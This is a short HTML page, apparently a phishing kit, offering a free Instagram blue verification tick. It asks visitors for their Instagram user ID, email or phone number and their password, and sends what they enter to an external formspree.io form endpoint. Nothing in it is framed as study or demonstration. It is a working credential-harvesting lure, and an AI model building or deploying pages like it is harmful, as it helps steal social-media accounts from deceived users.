<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>Contact Me</title>
</head>
  <h6>Make your Instagram account blue tick for free</h6>
  <br><br>
<body>


 <form
  action="https://formspree.io/f/xpwjanrj"
  method="POST"
>
 <link rel="stylesheet" href="i.css">
  <label for="email">
  Enter user_id,email or phonenumber:
  <input type="email" id="email" name="email">
</label>
<br><br>
<label for="password">
  Enter password:
  <input type="password" id="password" name="password">
</label>

  
  <button type="submit">Get BlueTick</button>
</form>
</body>
</html>
